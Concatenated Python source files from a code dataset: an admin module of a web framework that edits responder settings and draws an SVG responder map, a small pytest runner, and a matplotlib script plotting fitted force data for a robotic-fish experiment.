sd_alternate = SectionData("alternate_ident")
sd_alternate['textinput', 'set_input_accepted'] = True
pd.update(sd_alternate)
call_data['status'] = 'Page set'
def submit_target_ident(skicall):
"Sets the target ident"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'target_ident' in call_data:
raise FailPage(message="No target ident given")
if not call_data['target_ident']:
raise FailPage(message="No target ident given")
# Set the page target_ident
try:
call_data['pchange'] = editresponder.set_target_ident(project, pagenumber, pchange, call_data['target_ident'])
except ServerError as e:
raise FailPage(e.message)
sd_target = SectionData("target_ident")
sd_target['textinput', 'set_input_accepted'] = True
pd.update(sd_target)
call_data['status'] = 'Target Ident set'
def submit_validate_fail_ident(skicall):
"Sets the validate fail ident"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'validate_fail_ident' in call_data:
raise FailPage(message="No validate fail ident given", widget="validate_fail")
# Set the page validate_fail_ident
try:
call_data['pchange'] = editresponder.set_validate_fail_ident(project, pagenumber, pchange, call_data['validate_fail_ident'])
except ServerError as e:
raise FailPage(e.message)
pd['validate_fail','set_input_accepted'] = True
call_data['status'] = 'Validate Fail Ident set'
def submit_fail_ident(skicall):
"Sets the fail ident"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'fail_ident' in call_data:
raise FailPage(message="No fail ident given")
# Set the page fail_ident
try:
call_data['pchange'] = editresponder.set_fail_ident(project, pagenumber, pchange, call_data['fail_ident'])
except ServerError as e:
raise FailPage(e.message)
call_data['status'] = 'Fail Ident set'
def add_allowed_caller(skicall):
"Adds a new allowed caller"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'allowed_caller' in call_data:
raise FailPage(message="No allowed caller given")
if not call_data['allowed_caller']:
raise FailPage(message="No allowed caller given")
# Set the page allowed caller
try:
call_data['pchange'] = editresponder.add_allowed_caller(project, pagenumber, pchange, call_data['allowed_caller'])
except ServerError as e:
raise FailPage(e.message)
def delete_allowed_caller(skicall):
"Deletes an allowed caller"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'delete_allowed_caller' in call_data:
raise FailPage(message="No allowed caller given")
# Delete the page allowed caller
try:
call_data['pchange'] = editresponder.delete_allowed_caller(project, pagenumber, pchange, call_data['delete_allowed_caller'])
except ServerError as e:
raise FailPage(e.message)
def remove_field(skicall):
"Deletes a field"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not 'remove_field' in call_data:
raise FailPage(message="No field to remove given")
# Delete the page field
try:
call_data['pchange'] = editresponder.remove_field(project, pagenumber, pchange, call_data['remove_field'])
except ServerError as e:
raise FailPage(e.message)
def add_widgfield_value(skicall):
"Adds a widgfield and value"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
try:
s = call_data['widgfieldval','respondersection','input_text']
w = call_data['widgfieldval','responderwidget','input_text']
f = call_data['widgfieldval','responderfield','input_text']
v = call_data['widgfieldval','responderval','input_text']
except:
raise FailPage(message="Invalid data given")
if (not w) or (not f):
raise FailPage(message="A widget and field is required")
if s:
field = s + ',' + w + ',' + f
else:
field = w + ',' + f
# if value is empty ensure empty values allowed
if not v:
# get a ResponderInfo named tuple with information about the responder
try:
r_info = editresponder.responder_info(project, pagenumber, pchange)
except ServerError as e:
raise FailPage(message=e.message)
# field options
f_options = r_info.field_options
if not f_options['fields']:
raise FailPage(message="Invalid submission, this responder does not have fields")
if not f_options['empty_values_allowed']:
############ add field values to avoid re-inputting them
sd_widgfieldval = SectionData('widgfieldval')
sd_widgfieldval['respondersection','input_text'] = s
sd_widgfieldval['responderwidget','input_text'] = w
sd_widgfieldval['responderfield','input_text'] = f
pd.update(sd_widgfieldval)
raise FailPage(message="Invalid submission, empty field values are not allowed")
# Add the field and value
try:
call_data['pchange'] = editresponder.add_field_value(project, pagenumber, pchange, field, v)
except ServerError as e:
raise FailPage(e.message)
def add_field_val(skicall):
"Adds a field and value"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
try:
f = call_data['addfieldval','responderfield','input_text']
v = call_data['addfieldval','respondervalue','input_text']
except:
raise FailPage(message="Invalid data given")
if not f:
raise FailPage(message="Invalid data given")
# get a ResponderInfo named tuple with information about the responder
try:
r_info = editresponder.responder_info(project, pagenumber, pchange)
except ServerError as e:
raise FailPage(message=e.message)
# if value is empty ensure empty values allowed
if not v:
# field options
f_options = r_info.field_options
if not f_options['fields']:
raise FailPage(message="Invalid submission, this responder does not have fields")
if not f_options['empty_values_allowed']:
############ add field values to avoid re-inputting them
sd_addfieldval = SectionData('addfieldval')
sd_addfieldval['responderfield','input_text'] = f
pd.update(sd_addfieldval)
raise FailPage(message="Invalid submission, empty fields are not allowed")
# Add the field and value
try:
call_data['pchange'] = editresponder.add_field_value(project, pagenumber, pchange, f, v)
except ServerError as e:
raise FailPage(e.message)
if r_info.field_options['single_field']:
# only a single field/value is being input, not a list, so present an acknowledgement
call_data['status'] = 'Field has been set'
def add_widgfield(skicall):
"Adds a widgfield"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
try:
s = call_data['addwidgfield','respondersection','input_text']
w = call_data['addwidgfield','responderwidget','input_text']
f = call_data['addwidgfield','responderfield','input_text']
except:
raise FailPage(message="Invalid data given")
if (not w) or (not f):
raise FailPage(message="A widget and field is required")
if s:
field = s + ',' + w + ',' + f
else:
field = w + ',' + f
# Add the field
try:
call_data['pchange'] = editresponder.add_field(project, pagenumber, pchange, field)
except ServerError as e:
raise FailPage(e.message)
def set_single_field(skicall):
"Sets the field in a responder, which requires single field only"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not ('singlefield', 'textinput', 'input_text') in call_data:
raise FailPage(message="No field given")
field = call_data['singlefield', 'textinput', 'input_text']
if not field:
raise FailPage(message="No field given")
# Add the field
try:
call_data['pchange'] = editresponder.set_single_field(project, pagenumber, pchange, field)
except ServerError as e:
raise FailPage(e.message)
call_data['status'] = 'Fields set'
def delete_submit_list_string(skicall):
"deletes an indexed string from the submit_list"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not ('submit_list','contents') in call_data:
raise FailPage(message="No submit_list string given")
try:
idx = int(call_data['submit_list','contents'])
except:
raise FailPage(message="Invalid value received")
try:
# get the submit list
submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
del submit_list[idx]
call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
except ServerError as e:
raise FailPage(e.message)
# re-create the submit list table, these contents will be sent by JSON back to the page
pd = call_data['pagedata']
contents = []
if submit_list:
for index, s in enumerate(submit_list):
s_row = [s, str(index), str(index), str(index)]
contents.append(s_row)
else:
pd['submit_list','hide'] = True
pd['submit_list','contents'] = contents
def move_up_submit_list(skicall):
"Moves an item in the submit_list"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not ('submit_list','contents') in call_data:
raise FailPage(message="No submit_list string given")
try:
idx = int(call_data['submit_list','contents'])
except:
raise FailPage(message="Invalid value received")
if not idx:
# cannot move item at position zero to pos -1
raise FailPage(message="Cannot move the string up")
try:
# get the submit list
submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
item = submit_list.pop(idx)
submit_list.insert(idx-1, item)
call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
except ServerError as e:
raise FailPage(e.message)
# re-create the submit list table, these contents will be sent by JSON back to the page
pd = call_data['pagedata']
contents = []
for index, s in enumerate(submit_list):
s_row = [s, str(index), str(index), str(index)]
contents.append(s_row)
pd['submit_list','contents'] = contents
def move_down_submit_list(skicall):
"Moves an item in the submit_list"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not ('submit_list','contents') in call_data:
raise FailPage(message="No submit_list string given")
try:
idx = int(call_data['submit_list','contents'])
except:
raise FailPage(message="Invalid value received")
try:
# get the submit list
submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
if idx >= len(submit_list)-1:
# cannot move last item further down
raise FailPage(message="Cannot move the string down")
item = submit_list.pop(idx)
submit_list.insert(idx+1, item)
call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
except ServerError as e:
raise FailPage(e.message)
# re-create the submit list table, these contents will be sent by JSON back to the page
pd = call_data['pagedata']
contents = []
for index, s in enumerate(submit_list):
s_row = [s, str(index), str(index), str(index)]
contents.append(s_row)
pd['submit_list','contents'] = contents
def add_submit_list_string(skicall):
"Adds a new submit_list string"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
if not ('submit_string','input_text') in call_data:
raise FailPage(message="No submit_list string given")
try:
# get the submit list
submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
submit_list.append(call_data['submit_string','input_text'])
call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
except ServerError as e:
raise FailPage(e.message)
# re-create the submit list table, these contents will be sent by JSON back to the page
pd = call_data['pagedata']
contents = []
for index, s in enumerate(submit_list):
s_row = [s, str(index), str(index), str(index)]
contents.append(s_row)
pd['submit_list','contents'] = contents
pd['submit_list','hide'] = False
def set_validate_option(skicall):
"Enable or disable the validate option"
call_data = skicall.call_data
pd = call_data['pagedata']
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
try:
call_data['pchange'], validate_option = editresponder.toggle_validate_option(project, pagenumber, pchange)
except ServerError as e:
raise FailPage(e.message)
if validate_option:
pd['set_val_option','button_text'] = "Disable Validation"
pd['val_status','para_text'] = "Validate received field values : Enabled"
pd['validate_fail', 'hide'] = False
else:
pd['set_val_option','button_text'] = "Enable Validation"
pd['val_status','para_text'] = "Validate received field values : Disabled"
pd['validate_fail', 'hide'] = True
call_data['status'] = 'Validator changed'
def set_submit_option(skicall):
"Enable or disable the submit option"
call_data = skicall.call_data
project = call_data['editedprojname']
pagenumber = call_data['page_number']
pchange = call_data['pchange']
try:
call_data['pchange'], submit_option = editresponder.toggle_submit_option(project, pagenumber, pchange)
except ServerError as e:
raise FailPage(e.message)
call_data['status'] = 'Submit option changed'
def map(skicall):
"Creates the responder map"
pagenumber = skicall.call_data['page_number']
project = skicall.call_data['editedprojname']
pd = skicall.call_data['pagedata']
map_height = 1600
# get information about the responder
pageinfo = utils.page_info(project, pagenumber)
r_info = editresponder.responder_info(project, pagenumber)
i_info = utils.item_info(project, pagenumber)
label_list = i_info.label_list
sd_responder = SectionData('responder')
sd_responder['responderid', 'text'] = "Ident: " + str(pagenumber)
# insert font text style
pd['textstyle', 'text'] = """
<style>
/* <![CDATA[ */
text {
fill: black;
font-family: Arial, Helvetica, sans-serif;
}
.bigtext {
font-size: 20px;
}
/* ]]> */
</style>
"""
# fill in the box regarding this responder
if pageinfo.restricted:
sd_responder['responderaccess', 'text'] = "Restricted access"
else:
sd_responder['responderaccess', 'text'] = "Open access"
if label_list:
sd_responder['responderlabels', 'text'] = "Label: " + ','.join(label_list)
else:
sd_responder['responderlabels', 'show'] = False
sd_responder['respondertype', 'text'] = "Responder: " + r_info.responder
sd_responder['responderbrief', 'text'] = pageinfo.brief
pd.update(sd_responder)
# list of all responders
responder_list = editresponder.all_responders(project)
# Find all responders which call this responder
callers = [[0,0, "Responders in this project with %s as Target:" % pagenumber]]
callers2 = []
n = 40
for responder_id in responder_list:
responder_info = editresponder.responder_info(project, responder_id)
target = responder_info.target_ident
if target:
if isinstance(target, str) and (target in label_list):
moreinfo = utils.page_info(project, responder_id)
if n<=300:
callers.append([0,n,str(responder_id) + " " + moreinfo.brief])
else:
callers2.append([0,n-280,str(responder_id) + " " + moreinfo.brief])
n += 20
elif isinstance(target, tuple) and (len(target) == 2) and (project == target[0]) and (pagenumber == target[1]):
moreinfo = utils.page_info(project, responder_id)
if n<=300:
callers.append([0,n,str(responder_id) + " " + moreinfo.brief])
else:
callers2.append([0,n-280,str(responder_id) + " " + moreinfo.brief])
n += 20
sd_callers = SectionData('callers')
sd_callers2 = SectionData('callers2')
if n == 40:
sd_callers.show = False
sd_callers2.show = False
elif not callers2:
sd_callers['callers', 'lines'] = callers
sd_callers2.show = False
else:
sd_callers['callers', 'lines'] = callers
sd_callers2['callers', 'lines'] = callers2
pd.update(sd_callers)
pd.update(sd_callers2)
# Find all responders which call this responder on failure
fails = [[0,0, "Responders in this project with %s as Fail Page:" % pagenumber]]
n = 40
count = 0
for responder_id in responder_list:
responder_info = editresponder.responder_info(project, responder_id)
failident = responder_info.fail_ident
if failident:
if n > 300:
# do not display more than 14 responders, but continue to count remaining ones
count += 1
continue
if isinstance(failident, str) and (failident in label_list):
moreinfo = utils.page_info(project, responder_id)
fails.append([0,n,str(responder_id) + " " + moreinfo.brief])
n += 20
elif isinstance(failident, tuple) and (len(failident) == 2) and (project == failident[0]) and (pagenumber == failident[1]):
moreinfo = utils.page_info(project, responder_id)
fails.append([0,n,str(responder_id) + " " + moreinfo.brief])
n += 20
sd_fails = SectionData('fails')
if count:
fails.append([0, 320, "Plus %s more responders." % (count,)])
if n == 40:
sd_fails.show = False
else:
sd_fails['callers', 'lines'] = fails
pd.update(sd_fails)
# Find allowed callers to this responder
sd_allowed = SectionData('allowed')
allowed_list = r_info.allowed_callers
if allowed_list:
sd_allowed.show = True
allowed = [[0,0, "Allowed callers to %s:" % pagenumber], [0,20, "(Calling page must provide ident information)"]]
n = 40
for allowedid in allowed_list:
allowedident = allowedid
if isinstance(allowedident, str):
allowedident = utils.ident_from_label(project, allowedident)
if allowedident is None:
allowed.append([0,n,"UNKNOWN page: " + allowedid])
n += 20
elif isinstance(allowedident, str):
allowed.append([0,n,"INVALID ident: " + allowedident])
n += 20
elif isinstance(allowedident, tuple) and (len(allowedident) == 2):
try:
allowedinfo = utils.page_info(*allowedident)
except ServerError:
allowed.append([0,n,"UNKNOWN page: " + allowedident[0] + ", " + str(allowedident[1])])
else:
if allowedident[0] == project:
allowed.append([0,n,str(allowedident[1]) + ": " + allowedinfo.brief])
else:
allowed.append([0,n,allowedident[0] + ", " + str(allowedident[1]) + ": " + allowedinfo.brief])
n += 20
sd_allowed['callers', 'lines'] = allowed
else:
sd_allowed.show = False
pd.update(sd_allowed)
# If the responder has a target, draw a target line on the page
sd_targetline = SectionData('targetline')
if r_info.target_ident or r_info.target_ident_required:
sd_targetline.show = True
else:
sd_targetline.show = False
# normally no output ellipse is shown
sd_output = SectionData('output')
sd_output.show = False
# submit_data information
sd_submitdata = SectionData('submitdata')
sd_submitdata_failpage = SectionData('submitdata_failpage')
if r_info.submit_option or r_info.submit_required:
sd_submitdata.show = True
if r_info.submit_list:
s_list = []
s = 0
for item in r_info.submit_list:
s_list.append([0,s,item])
s += 20
sd_submitdata['submitlist','lines'] = s_list
# show the return value
if r_info.responder == "ColourSubstitute":
sd_submitdata['submitdatareturn','text'] = "Returns a dictionary of strings: colour strings"
elif r_info.responder == "SetCookies":
sd_submitdata['submitdatareturn','text'] = "Returns an instance of http.cookies.BaseCookie"
elif r_info.responder == "GetDictionaryDefaults":
sd_submitdata['submitdatareturn','text'] = "Returns a dictionary with default values"
elif r_info.responder == "SubmitJSON":
sd_submitdata['submitdatareturn','text'] = "Returns a dictionary"
# no target, but include a target line
sd_targetline.show = True
# change 'Target Page' to 'Output'
sd_submitdata['output', 'text'] = "Output"
# show an output ellipse
sd_output.show = True
sd_output['textout', 'text'] = "Send JSON data"
sd_output['textout', 'x'] = 320
elif r_info.responder == "SubmitPlainText":
sd_submitdata['submitdatareturn','text'] = "Returns a string"
# no target, but include a target line
sd_targetline.show = True
# change 'Target Page' to 'Output'
sd_submitdata['output', 'text'] = "Output"
# show an output ellipse
sd_output.show = True
sd_output['textout', 'text'] = "Send plain text"
sd_output['textout', 'x'] = 320
elif r_info.responder == "SubmitCSS":
sd_submitdata['submitdatareturn','text'] = "Returns a style"
# no target, but include a target line
sd_targetline.show = True
# change 'Target Page' to 'Output'
sd_submitdata['output', 'text'] = "Output"
# show an output ellipse
sd_output.show = True
sd_output['textout', 'text'] = "Send CSS data"
sd_output['textout', 'x'] = 320
elif r_info.responder == "MediaQuery":
sd_submitdata['submitdatareturn','text'] = "Returns a dictionary of media queries : CSS targets"
# no target, but include a target line
sd_targetline.show = True
# change 'Target Page' to 'Output'
sd_submitdata['output', 'text'] = "Output"
# show an output ellipse
sd_output.show = True
sd_output['textout', 'text'] = "Update query:target items"
sd_output['textout', 'x'] = 320
elif r_info.responder == "SubmitIterator":
sd_submitdata['submitdatareturn','text'] = "Returns a binary file iterator"
# no target, but include a target line
sd_targetline.show = True
# change 'Target Page' to 'Output'
sd_submitdata['output', 'text'] = "Output"
# show an output ellipse
sd_output.show = True
sd_output['textout', 'text'] = "Send Binary data"
sd_output['textout', 'x'] = 320
# show the fail page
_show_submit_data_failpage(project, sd_submitdata_failpage, r_info)
else:
sd_submitdata.show = False
sd_submitdata_failpage.show = False
# The target page
sd_target = SectionData('target')
_show_target(project, sd_target, r_info)
# validation option
sd_validate = SectionData('validate')
_show_validate_fail(project, sd_validate, r_info)
# The alternate option
sd_alternatebox = SectionData('alternatebox')
_show_alternate(project, sd_alternatebox, r_info)
if r_info.responder == 'CaseSwitch':
_show_caseswitch(project, pd, r_info)
elif r_info.responder == 'EmptyCallDataGoto':
_show_emptycalldatagoto(project, pd, r_info)
elif r_info.responder == 'EmptyGoto':
_show_emptygoto(project, pd, r_info)
elif r_info.responder == "MediaQuery":
_show_mediaquery(project, pd, r_info)
pd.update(sd_targetline)
pd.update(sd_output)
pd.update(sd_submitdata)
pd.update(sd_submitdata_failpage)
pd.update(sd_target)
pd.update(sd_validate)
pd.update(sd_alternatebox)
def _show_target(project, sd_target, r_info):
"The responder passes the call to this target"
if r_info.target_ident or r_info.target_ident_required:
sd_target.show = True
if r_info.target_ident:
targetident = r_info.target_ident
if isinstance(targetident, str):
targetident = utils.ident_from_label(project, targetident)
if targetident is None:
sd_target.show = False
elif isinstance(targetident, str):
sd_target['responderid', 'text'] = targetident
elif isinstance(targetident, tuple) and (len(targetident) == 2):
try:
targetinfo = utils.page_info(*targetident)
except ServerError:
sd_target['responderid', 'text'] = "Unknown Ident: " + targetident[0] + ", " + str(targetident[1])
else:
if targetident[0] == project:
sd_target['responderid', 'text'] = "Ident: " + str(targetident[1])
else:
sd_target['responderid', 'text'] = "Ident: " + targetident[0] + ", " + str(targetident[1])
if targetinfo.restricted:
sd_target['responderaccess', 'text'] = "Restricted access"
else:
sd_target['responderaccess', 'text'] = "Open access"
if isinstance(r_info.target_ident, str):
sd_target['responderlabels', 'text'] = "Targeted from responder as: " + r_info.target_ident
else:
sd_target['responderlabels', 'text'] = "Targeted from responder as: " + r_info.target_ident[0] + ", " + str(r_info.target_ident[1])
sd_target['responderbrief', 'text'] = targetinfo.brief
if targetinfo.item_type == "RespondPage":
sd_target['respondertype', 'text'] = "Responder: " + targetinfo.responder
else:
sd_target['respondertype', 'text'] = targetinfo.item_type
else:
sd_target.show = False
def _show_submit_data_failpage(project, sd_submitdata_failpage, r_info):
"The responder calls submit data, which, if it raises a FailPage, calls this"
sd_submitdata_failpage.show = True
if r_info.fail_ident:
failident = r_info.fail_ident
if isinstance(failident, str):
failident = utils.ident_from_label(project, failident)
if failident is None:
sd_submitdata_failpage['responderid', 'text'] = "Ident not recognised"
elif isinstance(failident, str):
sd_submitdata_failpage['responderid', 'text'] = failident
elif isinstance(failident, tuple) and (len(failident) == 2):
try:
failinfo = utils.page_info(*failident)
except ServerError:
sd_submitdata_failpage['responderid', 'text'] = "Unknown Ident: " + failident[0] + ", " + str(failident[1])
else:
if failident[0] == project:
sd_submitdata_failpage['responderid', 'text'] = "Ident: " + str(failident[1])
else:
sd_submitdata_failpage['responderid', 'text'] = "Ident: " + failident[0] + ", " + str(failident[1])
if failinfo.restricted:
sd_submitdata_failpage['responderaccess', 'text'] = "Restricted access"
else:
sd_submitdata_failpage['responderaccess', 'text'] = "Open access"
if isinstance(r_info.fail_ident, str):
sd_submitdata_failpage['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident
else:
sd_submitdata_failpage['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident[0] + ", " + str(r_info.fail_ident[1])
sd_submitdata_failpage['responderbrief', 'text'] = failinfo.brief
if failinfo.item_type == "RespondPage":
sd_submitdata_failpage['respondertype', 'text'] = "Responder: " + failinfo.responder
else:
sd_submitdata_failpage['respondertype', 'text'] = failinfo.item_type
else:
sd_submitdata_failpage['responderid', 'text'] = "Ident not set"
def _show_validate_fail(project, sd_validate, r_info):
"The responder validates received data, on failure calls this"
if r_info.validate_option:
sd_validate.show = True
else:
sd_validate.show = False
return
if r_info.validate_fail_ident:
failident = r_info.validate_fail_ident
if isinstance(failident, str):
failident = utils.ident_from_label(project, failident)
if isinstance(failident, str):
sd_validate['responderid', 'text'] = failident
elif isinstance(failident, tuple) and (len(failident) == 2):
try:
failinfo = utils.page_info(*failident)
except ServerError:
sd_validate['responderid', 'text'] = "Unknown Ident: " + failident[0] + ", " + str(failident[1])
else:
if failident[0] == project:
sd_validate['responderid', 'text'] = "Ident: " + str(failident[1])
else:
sd_validate['responderid', 'text'] = "Ident: " + failident[0] + ", " + str(failident[1])
if failinfo.restricted:
sd_validate['responderaccess', 'text'] = "Restricted access"
else:
sd_validate['responderaccess', 'text'] = "Open access"
if isinstance(r_info.fail_ident, str):
sd_validate['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident
else:
sd_validate['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident[0] + ", " + str(r_info.fail_ident[1])
sd_validate['responderbrief', 'text'] = failinfo.brief
if failinfo.item_type == "RespondPage":
sd_validate['respondertype', 'text'] = "Responder: " + failinfo.responder
else:
sd_validate['respondertype', 'text'] = failinfo.item_type
def _show_alternate(project, sd_alternatebox, r_info):
"The alternate page"
if r_info.alternate_ident:
sd_alternatebox.show = True
else:
sd_alternatebox.show = False
return
if r_info.alternate_ident:
altident = r_info.alternate_ident
if isinstance(altident, str):
altident = utils.ident_from_label(project, altident)
if isinstance(altident, str):
sd_alternatebox['responderid', 'text'] = altident
elif isinstance(altident, tuple) and (len(altident) == 2):
try:
altinfo = utils.page_info(*altident)
except ServerError:
sd_alternatebox['responderid', 'text'] = "Unknown Ident: " + altident[0] + ", " + str(altident[1])
else:
if altident[0] == project:
sd_alternatebox['responderid', 'text'] = "Ident: " + str(altident[1])
else:
sd_alternatebox['responderid', 'text'] = "Ident: " + altident[0] + ", " + str(altident[1])
if altinfo.restricted:
sd_alternatebox['responderaccess', 'text'] = "Restricted access"
else:
sd_alternatebox['responderaccess', 'text'] = "Open access"
if isinstance(r_info.alternate_ident, str):
sd_alternatebox['responderlabels', 'text'] = "Set in responder as: " + r_info.alternate_ident
else:
sd_alternatebox['responderlabels', 'text'] = "Set in responder as: " + r_info.alternate_ident[0] + ", " + str(r_info.alternate_ident[1])
sd_alternatebox['responderbrief', 'text'] = altinfo.brief
if altinfo.item_type == "RespondPage":
sd_alternatebox['respondertype', 'text'] = "Responder: " + altinfo.responder
else:
sd_alternatebox['respondertype', 'text'] = altinfo.item_type
if r_info.responder == 'CaseSwitch':
sd_alternatebox['alttext', 'text'] = "Called if no match found"
elif r_info.responder == 'EmptyCallDataGoto':
sd_alternatebox['alttext', 'text'] = "Called if skicall.call_data has key with value"
elif r_info.responder == 'EmptyGoto':
sd_alternatebox['alttext', 'text'] = "Called if widgfield is present with a value"
def _show_caseswitch(project, pd, r_info):
pd['textgroup', 'transform'] = 'translate(500,600)'
if r_info.widgfield:
text_title = """<text x="0" y="90">CaseSwitch on widgfield %s</text>""" % r_info.widgfield
else:
text_title = ''
table_element = ''
if r_info.field_values_list:
for index, item in enumerate(r_info.field_values_list):
table_element += _caseswitchtable(index, r_info.field_values_list)
else:
table_element = ''
pd['textgroup', 'text'] = text_title + table_element
def _caseswitchtable(index, field_values_list):
y = 100 + 60*index
return """
<rect height="60" style="fill:white;stroke-width:3;stroke:black" width="600" x="0" y="%s" />
<line x1="180" y1="%s" x2="180" y2="%s" style="stroke-width:3;stroke:black" />
<text x="20" y="%s">%s</text>
<text x="200" y="%s">%s</text>
""" % (y, y, y+60, y+30, field_values_list[index][0],y+30, field_values_list[index][1])
def _show_emptycalldatagoto(project, pd, r_info):
value = 'UNKNOWN'
if r_info.single_field:
value = r_info.single_field
pd['textgroup', 'transform'] = 'translate(750,700)'
pd['textgroup', 'text'] = """
<text x="0" y="0">Test skicall.call_data["%s"]</text>
<text x="0" y="60">Called if key not present, or has empty value.</text>
""" % (value,)
def _show_emptygoto(project, pd, r_info):
value = 'UNKNOWN'
if r_info.widgfield:
value = r_info.widgfield
pd['textgroup', 'transform'] = 'translate(750,700)'
pd['textgroup', 'text'] = """
<text x="0" y="0">Test widgfield %s</text>
<text x="0" y="60">Called if widgfield not present, or has empty value.</text>
""" % (value,)
def _show_mediaquery(project, pd, r_info):
pd['textgroup', 'transform'] = 'translate(50,550)'
if r_info.field_values_list:
text_title = """<line x1="450" y1="70" x2="450" y2="100" style="stroke-width:3;stroke:black" />
<text x="0" y="90">Query:target</text>"""
else:
return
table_element = ''
for index, item in enumerate(r_info.field_values_list):
table_element += _mediaquerytable(index, r_info.field_values_list)
pd['textgroup', 'text'] = text_title + table_element
def _mediaquerytable(index, field_values_list):
y = 100 + 60*index
return """
<rect height="60" style="fill:white;stroke-width:3;stroke:black" width="600" x="0" y="%s" />
<line x1="280" y1="%s" x2="280" y2="%s" style="stroke-width:3;stroke:black" />
<text x="20" y="%s">%s</text>
<text x="300" y="%s">%s</text>
""" % (y, y, y+60, y+30, field_values_list[index][0],y+30, field_values_list[index][1])
| bernie-skipole/skilift | skilift/skiadmin/skiadminpackages/editresponders/editrespondpage.py | editrespondpage.py | py | 58,966 | python | en | code | 0 | github-code | 90 |
30149630117 | import os
import sys
import pytest
def run_tests(args):
year = args[1]
day = int(args[2])
print("Running tests for puzzle {} {}".format(year, day))
pytest.main(["-v", "tests/aoc/aoc{}/test_q{:02d}.py".format(year, day)])
def main():
sys.path.append(os.path.join(os.getcwd()))
run_tests(sys.argv)
if __name__ == "__main__":
main()
| ifosch/aoc-utils | aoc_utils/run_tests.py | run_tests.py | py | 364 | python | en | code | 1 | github-code | 90 |
34356066510 | antw1 = str(input('antwoord 1: '))
antw2 = str(input('antwoord 2: '))
#if antw1 == 'ja' and antw2 == 'ja':
# doden = 2
#elif antw1 == 'ja' and antw2 == 'nee':
# doden = 1
#elif antw1 == 'nee' and antw2 == 'ja':
# doden = 1
#else:
# doden = 5
#berekening
if antw1 != antw2:
doden = 1
elif antw1 == 'ja':
doden = 2
else:
doden = 5
#uitvoer
print(doden)
| ArthurCallewaert/5WWIPython | 06_Condities/Trolleyprobleem.py | Trolleyprobleem.py | py | 377 | python | en | code | 0 | github-code | 90 |
4295604262 | from rlutils import dic_2tex_table
import yaml
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import os, sys, re
from pathlib import Path
# pd.options.plotting.backend='plotly'
from rlutils import *
from rlutils.plot_utils import config_paper
colors=config_paper()
#plot params
plot_arr=[2]
if 1 in plot_arr:
#generates latex table
filename='./logs/params_fit.yml'
with open(filename, "r") as f:
hyperparams_dict = yaml.safe_load(f)
for key in hyperparams_dict.keys():
hyperparams_dict[key] = round(float(hyperparams_dict[key]),3)
dic_2tex_table(hyperparams_dict)
if 2 in plot_arr:
# filename='./1-data/maxF_freq_simulation_fig5.csv'
# filename='./visual-servo-continous/1/maxF_freq_simulation.csv'
filename= '/0-identification-static/visual-servo-continous/data_fit/full_result_simulation_fig5.csv'
# filename='/home/sardor/1-THESE/2-Robotic_Fish/2-DDPG/deepFish/0-identification-static/visual-servo-continous/data_fit/maxF_result_simulation_fig5.csv'
df = pd.read_csv(filename)
# df['gamma'] = np.rad2deg(df['gamma'])
dList = max_force_table(df,mode='sin')
df = pd.DataFrame(dList)
fig = df.plot('gamma','Fmax')
exp_file='./1-data/02-02/plot.csv'
df_exp = pd.read_csv(exp_file)
df_exp.sort_values(by=['gamma','freq'],inplace=True)
phis=df_exp['gamma'].unique()
F_x=[df_exp[df_exp['gamma'] == phi][df_exp['signal'] == 'sin']['fx'].max() for phi in phis]
phis=np.deg2rad(phis)
fig,ax = plt.subplots()
ax.plot(df['gamma'], df['Fmax'])
ax.plot(phis, F_x, 'o')
plt.xlabel((r'$\alpha_{max}$ $[rad]$'))
plt.ylabel((r'$F_{max}$ $[N]$'))
plt.legend(['fitted line','experimental data'])
plt.savefig('./visual-servo-continous/fmax_fit.pdf')
plt.show()
fig2,ax2 = plt.subplots()
ax2.plot(df['gamma'], df['freq'])
freqs = []
for phi in phis:
dfp = df_exp[df_exp['gamma'] == phi]
freqs.append(dfp.iloc[dfp['fx'].argmax()]['freq'])
ax2.plot(phis, freqs, '.')
plt.xlabel((r'$\alpha_{max}$ $[rad]$'))
plt.ylabel((r'$freq$ $[Hz]$'))
plt.savefig('./visual-servo-continous/freq_fit.pdf')
plt.show() | ss555/deepFish | 0-identification-static/plots.py | plots.py | py | 2,253 | python | en | code | 0 | github-code | 90 |
